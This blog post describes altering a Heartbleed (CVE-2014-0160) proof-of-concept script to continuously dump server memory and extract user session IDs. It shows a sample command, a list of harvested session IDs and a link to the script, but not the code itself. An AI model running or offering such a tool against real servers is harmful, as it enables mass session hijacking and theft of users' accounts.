Using Heartbleed PoC for Hijacking User Sessions En Masse

Edit: Many people have commented on the fact that this would very likely land you in prison if you were to use it on unauthorized servers. This and any other exploit code you use on servers that you do not own is very much against the law. This code is for educational purposes only, and I take no resonsiblility for you doing something stupid with it.

If you have been living under a rock recently, Heartbleed is a bug in OpenSSL that allows anyone on the internet to read sections of memory on vulnerable servers.

Matthew Sullivan posted a blog post earlier today about using CVE-2014–0160 to hijack user sessions from vulnerable servers. I altered the proof of concept code written by Jared Stafford to continuously query a given server for memory chunks and parse those chunks for session ids.

Some very simple checks are in place to only spit out unique session IDs. You can check out Sullivan’s blog post to see how these session IDs can be inserted into a web browser to steal these users sessions.

Example output:

➜ ~ ./heartbleed-altered.py your_server.com session

session=1395650268  
session=1552654927  
session=9074328142  
session=1584630615  
session=1399867484  
session=1570915943  
session=6442471150  
session=1134475661  
session=1828846521  
session=1025417958  
session=1429746458  
session=9503698952  
session=3413620908  
session=5569288762  
session=3669059145  
session=1624974555  
session=1070329834  
session=1747925477  
session=1129670396  
session=1017137517  
session=2331559646  

Altered Script is available at https://gist.github.com/mpdavis/10171593